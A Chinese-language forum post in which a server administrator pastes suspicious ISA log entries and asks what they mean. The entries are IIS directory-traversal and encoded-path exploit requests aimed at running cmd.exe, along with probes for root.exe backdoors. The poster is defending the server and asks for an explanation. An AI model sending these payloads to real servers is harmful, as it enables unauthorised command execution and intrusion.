帮忙看看这些可疑的日志
今天看isa的日志,发现有外网访问内网已经发布的web服务器的一些日志,觉得有人试图越过iis的home目录访问并运行cmd.exe等程序。想了解这种攻击的一些详细介绍。
日志如下:
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir
http://xxx.xxx.xxx.xxx/MSADC/root.exe?/c+dir
http://xxx.xxx.xxx.xxx/c/winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/d/winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
http://xxx.xxx.xxx.xxx/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
那些..%252f..什么的代表什么意思?cmd.exe?/c+dir又是什么用法?
谢谢,我已经下载并安装了iis的lockdown tool,应该没有什么问题了吧